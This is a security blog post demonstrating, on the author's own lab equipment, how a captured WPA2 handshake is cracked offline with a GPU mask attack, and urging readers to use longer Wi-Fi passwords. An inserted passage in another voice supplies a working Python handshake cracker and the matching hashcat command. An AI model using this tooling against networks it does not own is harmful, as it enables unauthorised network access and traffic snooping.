When’s the last time you changed your Wi-Fi password? Perhaps you’re among many who have never thought to. When you signed up for Internet service, did you have the technician set up your modem for you? If so, your Wi-Fi password is probably way too short to be secure.

tl;dr: If your Wi-Fi password hasn’t been changed for years or it’s < 12 characters long, go change it. NOW.

How do I know this? I’ve been working on a book all about cybersecurity. As part of my research I looked into Wi-Fi security. I was stunned by what I found. And tried. In fact, it’s caused me to change a lot of my security policies at my business and at home.

In this post, I’m going to show you just how simple it was to crack a Wi-Fi password in my lab.

Exciting Shameless Plug: I’ve written a book on cybersecurity for business owners called Beyond Passwords: Secure Your Business. You can pre-order it at https://www.beyondpasswordsbook.com.

WARNING: This post is for educational purposes only. Cracking someone else’s Wi-Fi password without their permission may be a criminal offense depending on where you live. I’m not responsible for the misuse of this information.

The Tools

  • Lenovo Thinkpad T440s running Kali Linux.
  • My beefy desktop computer with an Nvidia 1080ti GPU running Windows 10.
  • A Wi-Fi router.

…and that’s it. Seriously. No crazy tools required for this attack. I executed the entire attack with two computers. Note that everything described in this post was done in my laboratory under controlled conditions. I own all the equipment.

Let me explain the scenario.

The Setup: an adversary wants to get your Wi-Fi password. They can’t get into your premises, but they are close enough to pick up your Wi-Fi signal. (Sidenote: with a high-gain directional antenna, that can be far beyond the range at which your own devices see the network, potentially miles.) They use a laptop computer to listen to your password-protected (encrypted) Wi-Fi traffic. Using a special tool, they force everyone on the Wi-Fi to disconnect and reconnect. Every time a device reconnects, it performs a “handshake” with the access point. The adversary spies on this handshake and captures it. The handshake does not contain the password itself, but it contains values derived from the password, and that is enough to test password guesses offline without ever talking to your router again.

The Hack: the adversary takes that captured handshake back to a computer (or botnet) they own to crack it. Laptops are generally too weak to do this quickly in the field. With a powerful computer, they start guessing passwords: each guess is run through the same key derivation your router uses, and the result is compared against the captured handshake. A match means the guess is your password.

Wi-Fi password cracking is tough by design. WPA2 deliberately runs every guess through 4,096 rounds of a hash function (PBKDF2-HMAC-SHA1) before it can be checked, so in the past a CPU could only test a few hundred passwords per second, and even a fairly simple password could take weeks or months.

A Graphics Processing Unit (GPU) runs that same key derivation for thousands of guesses in parallel. With even a modest GPU, this speeds up to over 100,000 passwords per second. My machine averaged 270,000 password guesses per second.

The Attack: with the password cracked, the attacker can now join your Wi-Fi. From there, they can scan for vulnerable computers and, because they hold the network key and captured the handshake, decrypt the Wi-Fi traffic of the other devices on the network, and much more. You’re now vulnerable to attack.

In my scenario, I set up a wireless access point called “hackme” with the password “95816781”. Not strong, but many routers ship with a default password of only 8 or 9 characters.

Once I spied on this network and forced all the devices (laptops, cellphones) to reconnect, I was able to grab the encrypted handshake. From there, I took that to my desktop computer and ran a tool called hashcat, which allowed me to crack this password on my computer’s graphics card.

I limited the range of guesses to all 8-digit numbers (a hashcat “mask” attack covering 00000000 through 99999999, 100 million candidates in total). After 4 minutes and 29 seconds… success.

[Image: Hacked.png]

Oh. Crap. Remember, I’m doing all of this on modest hardware. A dedicated attacker could easily rent a lot of GPU machines in the cloud at once, split the keyspace between them, and finish the same job in a fraction of the time.

My old Bell modem shipped with a very predictable Wi-Fi password: 8 hexadecimal characters, i.e. only the digits 0-9 and the uppercase letters A-F. That’s 16^8, only around 4.3 billion possible passwords. At 270,000 guesses a second, an attacker exhausts the entire keyspace in at worst 15,907 seconds, that is 265 minutes or 4.4 hours, and on average finds the password in about half that time.
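To make concrete what the captured handshake lets an attacker check offline, and where the keyspace arithmetic above comes from, here is an added example of my own. It is not the author’s hashcat run and not hashcat’s code: it reimplements the WPA2-PSK key derivation from IEEE 802.11i (PBKDF2, PRF-384, EAPOL-Key MIC), builds a constructed handshake for the SSID “hackme” and the password “95816781” (the MAC addresses, nonces and EAPOL frame are all made up for the demo), and runs a hashcat-style mask attack against it. The mask charsets (?d, ?l, ?u, ?h, ?H) follow hashcat’s notation; the function and variable names are mine.

```python
"""Added example (not the post's own hashcat run, nor hashcat's code): a
from-scratch WPA2-PSK handshake check plus a hashcat-style mask attack.
Everything about the 'captured' handshake below is constructed."""
import hashlib
import hmac
import itertools
import time

SSID = "hackme"          # network name from the post
PASSPHRASE = "95816781"  # password from the post

# hashcat mask charsets (subset): ?d digits, ?l lower, ?u upper, ?h/?H hex.
CHARSETS = {"d": "0123456789", "l": "abcdefghijklmnopqrstuvwxyz",
            "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ", "h": "0123456789abcdef",
            "H": "0123456789ABCDEF"}


def parse_mask(mask):
    """'958167?d?d' -> per-position character sets ('??' is a literal '?')."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in CHARSETS:
            positions.append(CHARSETS[mask[i + 1]])
            i += 2
        elif mask[i:i + 2] == "??":
            positions.append("?")
            i += 2
        else:
            positions.append(mask[i])  # literal character
            i += 1
    return positions


def keyspace(mask):
    """Number of candidates the mask expands to (16**8 for '?H' * 8)."""
    n = 1
    for charset in parse_mask(mask):
        n *= len(charset)
    return n


def worst_case_seconds(mask, guesses_per_sec):
    """Time to exhaust the whole keyspace; on average the hit comes at half."""
    return keyspace(mask) / guesses_per_sec


def candidates(mask):
    """Yield every candidate password the mask describes, in order."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def pmk(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    Those 4096 rounds are what make every single guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11i PRF-384: PTK from the PMK, both MAC addresses, both nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(3))
    return out[:48]  # KCK (16) | KEK (16) | TK (16)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid):
    """Construct what a real capture (airodump-ng .cap fed to hcxpcapngtool)
    yields: the two MACs, both nonces, message 2's EAPOL frame and its MIC."""
    ap_mac, sta_mac = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce = hashlib.sha256(b"constructed anonce").digest()  # fixed, for determinism
    snonce = hashlib.sha256(b"constructed snonce").digest()
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    eapol = (b"\x01\x03\x00\x75"          # 802.1X v1, EAPOL-Key, body length 117
             + b"\x02\x01\x0a\x00\x10"    # RSN descriptor; key info v2|pairwise|MIC; len 16
             + b"\x00" * 7 + b"\x01"      # replay counter
             + snonce + b"\x00" * 32      # key nonce, then key IV, RSC, key ID (zeroed)
             + b"\x00" * 16               # MIC field, zeroed for the computation
             + b"\x00\x16" + rsn_ie)      # key data length + RSN IE
    kck = ptk(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(handshake, candidate_passwords):
    """Offline test: derive PMK -> PTK -> KCK per guess; a matching MIC is a hit."""
    for guess in candidate_passwords:
        kck = ptk(pmk(guess, handshake["ssid"]), handshake["ap_mac"], handshake["sta_mac"],
                  handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return guess
    return None


def guesses_per_second(ssid=SSID, n=50):
    """Single-core CPU rate of this Python code; the post's GPU managed ~270,000."""
    start = time.perf_counter()
    for i in range(n):
        pmk(f"{i:08d}", ssid)
    return n / (time.perf_counter() - start)


if __name__ == "__main__":
    print(f"8-digit mask: {keyspace('?d' * 8):,} candidates, "
          f"{worst_case_seconds('?d' * 8, 270_000) / 60:.1f} min at 270k/s")
    print(f"8-hex-char mask: {keyspace('?H' * 8):,} candidates, "
          f"{worst_case_seconds('?H' * 8, 270_000) / 3600:.1f} h at 270k/s")
    captured = make_handshake(PASSPHRASE, SSID)
    # Narrow mask so the demo finishes in seconds in pure Python; against a real
    # capture you would give hashcat the full '?d?d?d?d?d?d?d?d'.
    print("cracked:", crack(captured, candidates("958167?d?d")))
    print(f"this CPU: {guesses_per_second():.0f} guesses/s")
```

The real-tool equivalent of `crack(captured, candidates("?d" * 8))` is `hashcat -m 22000 -a 3 hash.22000 '?d?d?d?d?d?d?d?d'` on the hash file produced from the capture. Note that nothing in the attack ever touches the router after the capture, which is why a rate limit on the access point does not help; only the size of the keyspace does.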

If your Wi-Fi password is 8 characters, it’s too short, and if it is made only of digits or hexadecimal characters it is far worse: the attacker doesn’t need to guess cleverly, they just need the search space to be small enough to walk through.

Remember: if an attacker can get into your network, you’re in huge trouble. They can snoop your data, search for vulnerabilities, and cause plenty of havoc.

Sources:

Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat

WPA2 Cracking Using Hashcat

Published by Elias Puurunen

Elias Puurunen is a versatile entrepreneur and President of Northern HCI Solutions Inc., an IT consulting firm which has worked with Fortune 500 companies, governments, and startups. He has spoken at conferences in Canada and the United States and has been published around the world. Part of his work led to an agreement between the Canadian Government and Siemens Canada, creating jobs and investment into green infrastructure. His company's event management app, the Tractus Event Passport connects people at conferences, seminars and symposiums across Canada. Today he is a consultant and advisor to technology firms and government organizations. He lectures at the University of Waterloo on Coding for Policy Analysis for the School of Public Policy. He is the author of Beyond Passwords: Secure Your Business, a cyber-security book for small business owners.
